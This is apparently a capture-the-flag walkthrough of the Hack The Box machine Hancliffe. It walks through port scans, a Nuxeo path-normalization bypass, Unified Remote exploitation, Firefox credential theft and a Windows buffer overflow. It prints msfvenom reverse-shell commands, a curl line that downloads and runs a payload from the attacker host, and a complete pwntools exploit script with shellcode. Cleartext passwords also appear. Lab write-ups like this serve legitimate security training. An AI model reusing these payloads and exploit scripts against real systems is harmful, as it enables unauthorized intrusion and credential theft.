Basic Information

Port Scan

80,8000,9999:

nmap -sC -sV 10.10.11.115
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-07 13:35 CST
Nmap scan report for 10.10.11.115
Host is up (0.086s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.21.0
|_http-title: Welcome to nginx!
|_http-server-header: nginx/1.21.0
8000/tcp open http nginx 1.21.0
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: HashPass | Open Source Stateless Password Manager
|_http-server-header: nginx/1.21.0
9999/tcp open abyss?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
| Welcome Brankas Application.
| Username: Password:
| NULL:
| Welcome Brankas Application.
|_ Username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port9999-TCP:V=7.92%I=7%D=3/7%Time=622599EF%P=x86_64-apple-darwin20.4.0
SF:%r(NULL,27,"Welcome\x20Brankas\x20Application\.\nUsername:\x20")%r(GetR
SF:equest,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\
SF:x20")%r(HTTPOptions,31,"Welcome\x20Brankas\x20Application\.\nUsername:\
SF:x20Password:\x20")%r(FourOhFourRequest,31,"Welcome\x20Brankas\x20Applic
SF:ation\.\nUsername:\x20Password:\x20")%r(JavaRMI,31,"Welcome\x20Brankas\
SF:x20Application\.\nUsername:\x20Password:\x20")%r(GenericLines,31,"Welco
SF:me\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(RTSPRequ
SF:est,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20
SF:")%r(RPCCheck,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Pas
SF:sword:\x20")%r(DNSVersionBindReqTCP,31,"Welcome\x20Brankas\x20Applicati
SF:on\.\nUsername:\x20Password:\x20")%r(DNSStatusRequestTCP,31,"Welcome\x2
SF:0Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(Help,31,"Welc
SF:ome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(SSLSess
SF:ionReq,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\
SF:x20")%r(TerminalServerCookie,31,"Welcome\x20Brankas\x20Application\.\nU
SF:sername:\x20Password:\x20")%r(TLSSessionReq,31,"Welcome\x20Brankas\x20A
SF:pplication\.\nUsername:\x20Password:\x20")%r(Kerberos,31,"Welcome\x20Br
SF:ankas\x20Application\.\nUsername:\x20Password:\x20")%r(SMBProgNeg,31,"W
SF:elcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(X11P
SF:robe,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x2
SF:0")%r(LPDString,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20P
SF:assword:\x20")%r(LDAPSearchReq,31,"Welcome\x20Brankas\x20Application\.\
SF:nUsername:\x20Password:\x20")%r(LDAPBindReq,31,"Welcome\x20Brankas\x20A
SF:pplication\.\nUsername:\x20Password:\x20")%r(SIPOptions,31,"Welcome\x20
SF:Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(LANDesk-RC,31,
SF:"Welcome\x20Brankas\x20Application\.\nUsername:\x20Password:\x20")%r(Te
SF:rminalServer,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x20Pass
SF:word:\x20")%r(NCP,31,"Welcome\x20Brankas\x20Application\.\nUsername:\x2
SF:0Password:\x20")%r(NotesRPC,31,"Welcome\x20Brankas\x20Application\.\nUs
SF:ername:\x20Password:\x20");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 221.08 seconds

80

The default nginx page:

8000

A password manager, built on the open-source HashPass:

9999

A custom service that asks for a username and password:

Directory Scan

A directory scan on port 80 finds /maintenance, which redirects to /nuxeo/Maintenance:

gobuster dir -u http://10.10.11.115/ -w /usr/share/dirb/wordlists/common.txt -x asp,aspx,php,html,txt -t 50

/maintenance (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/]

But visiting it directly returns a 404:

Path Handling

Nuxeo is a Java CMS sitting behind nginx as the front end, so there may be a path-normalization discrepancy between the two:

/maintenance/..;/
turns into this 404:

nxstartup.faces

/maintenance/..;/nuxeo/nxstartup.faces
is handled through to login.jsp

/maintenance/..;/nuxeo/login.jsp
lands on Nuxeo's own 404 page

Directory Scan

Based on the rule above, scan directories further:

gobuster dir -u "http://10.10.11.115/maintenance/..;" -w /usr/share/dirb/wordlists/common.txt -x jsp -t 50

/analytics (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/analytics/]
/authentication (Status: 401) [Size: 220]
/directory (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/directory/]
/group (Status: 401) [Size: 220]
/index.jsp (Status: 302) [Size: 0] [--> http://10.10.11.115/nuxeo/nxstartup.faces]
/jsf (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/jsf/]
/login (Status: 401) [Size: 220]
/logout (Status: 401) [Size: 220]
/login.jsp (Status: 200) [Size: 8872]
/oauth (Status: 401) [Size: 220]
/pages (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/pages/]
/pagination (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/pagination/]
/resources (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/resources/]
/scripts (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/scripts/]
/search (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/search/]
/tinymce (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/tinymce/]
/ui (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/ui/]
/user (Status: 401) [Size: 220]
/users (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/users/]
/viewer (Status: 401) [Size: 220]
/webservices (Status: 401) [Size: 220]
/widgets (Status: 302) [Size: 0] [--> /nuxeo/Maintenance/..;/widgets/]
/ws (Status: 401) [Size: 220]

login.jsp

From these results the login page is reachable, and the version number FT 10.2 is shown at the bottom:

http://10.10.11.115/maintenance/..;/login.jsp

Nuxeo

Searching by version turns up a related vulnerability:

svc_account

After adjusting the paths in the exploit and running it, we now have svc_account privileges:

reverse shell

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f exe -o msf.exe

curl http://10.10.14.15:7777/msf.exe -o /programdata/msf.exe
/programdata/msf.exe

Unified Remote 3

Looking through the files reveals Unified Remote 3:

The vulnerability related to this version:

exploit

Forward the port out, change the download directory in the exploit, run it, and get a shell:

# meterpreter
portfwd add -l 9512 -p 9512 -r 127.0.0.1

# in the exploit, change "C:\Windows\Temp" to "C:\\programdata\\"

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4445 -f exe > rev.exe
python 49587.py 127.0.0.1 10.10.14.15 rev.exe

user flag

user.txt is on clara's desktop:

firefox

Enumeration shows that the clara user has a Firefox profile; for convenience, meterpreter is used directly here:

use post/multi/gather/firefox_creds

Firepwd

(Newer versions of winPEAS decrypt this password automatically.)

Decrypting with Firepwd yields a password related to development; listing users also shows a development user:

decrypting login/password pairs
http://localhost:8000:b'hancliffe.htb',b'#@H@ncLiff3D3velopm3ntM@st3rK3y*!'

development

Go back to port 8000 with this information and generate the password:

development
hancliffe.htb
#@H@ncLiff3D3velopm3ntM@st3rK3y*!
AMl.q2DHp?2.C/V0kNFU

winrm

Checking the user's details also shows that development is allowed remote access, so forward the WinRM port out too; logging in with the generated password succeeds:

portfwd add -l 5985 -p 5985 -r 127.0.0.1

devapp

In devapp there is an exe, the one serving port 9999; download it for analysis:

BOF

See 0xdf's blog and video for the detailed analysis. In short, once the username and password check passes, execution enters the _SaveCreds function, which copies code with strcpy, so there is a buffer overflow.

It also involves analysing and reversing a few encoding algorithms.

username = "alfiansyah";
enc_pass = "YXlYeDtsbD98eDtsWms5SyU=";
decrypted : K3r4j@@nM4j@pAh!T

void __cdecl _SaveCreds(char *code,char *fullname)

{
char code_copy [50];
char *fullname_copy;

fullname_copy = (char *)_malloc(100);
_strcpy(fullname_copy,fullname);
_strcpy(code_copy,code);
return;
}

rot47
atbash
base64

From Base64, Atbash Cipher, ROT47 - CyberChef
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Atbash_Cipher()ROT47(47)&input=WVhsWWVEdHNiRDk4ZUR0c1dtczVTeVU9
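The decode chain from the CyberChef recipe above, written out as an added C example (mine, not code from the writeup or the Brankas binary): Base64, then Atbash, then ROT47. b64_decode and decode_matches are my own names; the input is the enc_pass value shown above.

```c
#include <stdio.h>
#include <string.h>

/* Decode standard Base64 (with '=' padding) into out; returns byte count or -1. */
static int b64_decode(const char *in, unsigned char *out, size_t outcap) {
    static const char tbl[] =
        "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    unsigned acc = 0; int bits = 0; size_t n = 0;
    for (; *in && *in != '='; in++) {
        const char *p = strchr(tbl, *in);
        if (!p) return -1;                       /* not a Base64 character */
        acc = (acc << 6) | (unsigned)(p - tbl);
        bits += 6;
        if (bits >= 8) {
            bits -= 8;
            if (n >= outcap) return -1;          /* output buffer too small */
            out[n++] = (unsigned char)((acc >> bits) & 0xff);
        }
    }
    return (int)n;
}

/* Atbash mirrors the alphabet (a<->z, A<->Z); ROT47 rotates printable ASCII
 * 33..126 by 47. Both are self-inverse, so decoding is the same step as encoding. */
static char atbash(char c) {
    if (c >= 'a' && c <= 'z') return (char)('z' - (c - 'a'));
    if (c >= 'A' && c <= 'Z') return (char)('Z' - (c - 'A'));
    return c;
}
static char rot47(char c) {
    return (c >= 33 && c <= 126) ? (char)(33 + ((c - 33 + 47) % 94)) : c;
}

/* Full chain from the CyberChef recipe: Base64 -> Atbash -> ROT47.
 * Returns 1 if the decoded value equals expected, 0 on mismatch or bad input. */
int decode_matches(const char *enc, const char *expected) {
    char buf[128];
    int n = b64_decode(enc, (unsigned char *)buf, sizeof buf - 1);
    if (n < 0) return 0;
    buf[n] = '\0';
    for (int i = 0; i < n; i++) buf[i] = rot47(atbash(buf[i]));
    return strcmp(buf, expected) == 0;
}

int main(void) {
    const char *enc = "YXlYeDtsbD98eDtsWms5SyU=";   /* enc_pass from the binary */
    printf("%s\n", decode_matches(enc, "K3r4j@@nM4j@pAh!T") ? "match" : "mismatch");
    return 0;
}
```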

debug

Standard Windows BOF debugging workflow: run it locally, trial and error. It is harder than the pre-revision OSCP BOF, probably OSED-level: there is not enough usable space, so 0xdf's approach is to jump back to the start of the buffer and reuse the socket:

EIP offset 66
jmp esp p32(0x7190239f)
metasm > jmp $-70
"\xeb\xb8"

exploit.py

#!/usr/bin/env python3

from pwn import *


r = remote(args['IP'], args['PORT'])

# msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -b "\x00" -f python

buf = b""
buf += b"\xb8\x23\x55\xbb\x84\xdb\xca\xd9\x74\x24\xf4\x5f\x31"
buf += b"\xc9\xb1\x52\x83\xc7\x04\x31\x47\x0e\x03\x64\x5b\x59"
buf += b"\x71\x96\x8b\x1f\x7a\x66\x4c\x40\xf2\x83\x7d\x40\x60"
buf += b"\xc0\x2e\x70\xe2\x84\xc2\xfb\xa6\x3c\x50\x89\x6e\x33"
buf += b"\xd1\x24\x49\x7a\xe2\x15\xa9\x1d\x60\x64\xfe\xfd\x59"
buf += b"\xa7\xf3\xfc\x9e\xda\xfe\xac\x77\x90\xad\x40\xf3\xec"
buf += b"\x6d\xeb\x4f\xe0\xf5\x08\x07\x03\xd7\x9f\x13\x5a\xf7"
buf += b"\x1e\xf7\xd6\xbe\x38\x14\xd2\x09\xb3\xee\xa8\x8b\x15"
buf += b"\x3f\x50\x27\x58\x8f\xa3\x39\x9d\x28\x5c\x4c\xd7\x4a"
buf += b"\xe1\x57\x2c\x30\x3d\xdd\xb6\x92\xb6\x45\x12\x22\x1a"
buf += b"\x13\xd1\x28\xd7\x57\xbd\x2c\xe6\xb4\xb6\x49\x63\x3b"
buf += b"\x18\xd8\x37\x18\xbc\x80\xec\x01\xe5\x6c\x42\x3d\xf5"
buf += b"\xce\x3b\x9b\x7e\xe2\x28\x96\xdd\x6b\x9c\x9b\xdd\x6b"
buf += b"\x8a\xac\xae\x59\x15\x07\x38\xd2\xde\x81\xbf\x15\xf5"
buf += b"\x76\x2f\xe8\xf6\x86\x66\x2f\xa2\xd6\x10\x86\xcb\xbc"
buf += b"\xe0\x27\x1e\x12\xb0\x87\xf1\xd3\x60\x68\xa2\xbb\x6a"
buf += b"\x67\x9d\xdc\x95\xad\xb6\x77\x6c\x26\xb3\x8d\x60\xb9"
buf += b"\xab\x93\x7c\xd4\x77\x1d\x9a\xbc\x97\x4b\x35\x29\x01"
buf += b"\xd6\xcd\xc8\xce\xcc\xa8\xcb\x45\xe3\x4d\x85\xad\x8e"
buf += b"\x5d\x72\x5e\xc5\x3f\xd5\x61\xf3\x57\xb9\xf0\x98\xa7"
buf += b"\xb4\xe8\x36\xf0\x91\xdf\x4e\x94\x0f\x79\xf9\x8a\xcd"
buf += b"\x1f\xc2\x0e\x0a\xdc\xcd\x8f\xdf\x58\xea\x9f\x19\x60"
buf += b"\xb6\xcb\xf5\x37\x60\xa5\xb3\xe1\xc2\x1f\x6a\x5d\x8d"
buf += b"\xf7\xeb\xad\x0e\x81\xf3\xfb\xf8\x6d\x45\x52\xbd\x92"
buf += b"\x6a\x32\x49\xeb\x96\xa2\xb6\x26\x13\xd2\xfc\x6a\x32"
buf += b"\x7b\x59\xff\x06\xe6\x5a\x2a\x44\x1f\xd9\xde\x35\xe4"
buf += b"\xc1\xab\x30\xa0\x45\x40\x49\xb9\x23\x66\xfe\xba\x61"
shellcode = buf

recv_sc = (
# get socket descriptor in esi
b"\x54" # push esp
b"\x58" # pop eax
b"\x66\x05\x49\x01" # add ax, 0x149
b"\x66\x2d\x01\x01" # sub ax, 0x101
b"\x8b\x30" # mov esi, dword [eax]

# make space on stack
b"\x83\xec\x64" # sub esp, 0x64

# push recv args
b"\x31\xdb" # xor ebx, ebx
b"\x53" # push ebx, recv flags = 0
b"\x66\x81\xc3\x04\x04" # add bx, 0x404
b"\x53" # push ebx, size = 0x404
b"\x54" # push esp
b"\x5b" # pop ebx
b"\x83\xc3\x64" # add ebx, 0x64
b"\x53" # push ebx, buffer
b"\x56" # push esi, sock descriptor

# call recv
b"\x3e\xa1\xac\x82\x90\x71" # mov eax, [0x719082ac]
b"\xff\xd0" # call eax
)

payload = recv_sc + b"\x90"*(66-len(recv_sc)) + p32(0x7190239f) + b"\xeb\xb8"

r.recvuntil(b"Username: ")
r.sendline(b"alfiansyah")
r.recvuntil(b"Password: ")
r.sendline(b"K3r4j@@nM4j@pAh!T")
r.recvuntil(b"FullName: ")
r.sendline(b"0xdf")
r.recvuntil(b"Input Your Code: ")
r.sendline(payload)
time.sleep(1)
r.send(shellcode)
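For the defender's side of the bug the script above exploits, an added C example that is not code from the writeup or the Brankas binary: a reconstruction of _SaveCreds next to a hardened version that rejects input that would not fit, using the 50-byte and 100-byte sizes from the decompilation. The function names (other than _SaveCreds) and the 0/-1 return convention are my assumptions.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define CODE_MAX     50   /* char code_copy[50] in the decompilation */
#define FULLNAME_MAX 100  /* _malloc(100) in the decompilation */

/* Reconstruction of the vulnerable routine: neither strcpy checks that its
 * source fits, so a long code runs past code_copy into the saved return address. */
void SaveCreds_vulnerable(const char *code, const char *fullname) {
    char code_copy[CODE_MAX];
    char *fullname_copy = malloc(FULLNAME_MAX);
    if (!fullname_copy) return;
    strcpy(fullname_copy, fullname);   /* heap overflow if strlen(fullname) >= 100 */
    strcpy(code_copy, code);           /* stack overflow if strlen(code) >= 50 */
    free(fullname_copy);
}

/* Length check that never reads more than max bytes (safe on unterminated input). */
static size_t bounded_len(const char *s, size_t max) {
    size_t n = 0;
    while (n < max && s[n]) n++;
    return n;
}

/* Hardened version: reject input that would not fit with its NUL, then copy with
 * an explicit bound. Returns 0 when stored, -1 when rejected. */
int SaveCreds_hardened(const char *code, const char *fullname) {
    char code_copy[CODE_MAX];
    if (bounded_len(code, CODE_MAX) >= CODE_MAX) return -1;
    if (bounded_len(fullname, FULLNAME_MAX) >= FULLNAME_MAX) return -1;
    char *fullname_copy = malloc(FULLNAME_MAX);
    if (!fullname_copy) return -1;
    snprintf(code_copy, sizeof code_copy, "%s", code);
    snprintf(fullname_copy, FULLNAME_MAX, "%s", fullname);
    /* ... the real program would persist code_copy / fullname_copy here ... */
    free(fullname_copy);
    return 0;
}

int main(void) {
    char sixtysix[67];                     /* 66 'A's: the EIP offset from the writeup */
    memset(sixtysix, 'A', 66); sixtysix[66] = '\0';
    printf("short code -> %d, 66-byte code -> %d\n",   /* prints 0 and -1 */
           SaveCreds_hardened("1234", "0xdf"), SaveCreds_hardened(sixtysix, "0xdf"));
    return 0;
}
```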

root flag

The BOF exploit lands as administrator:

References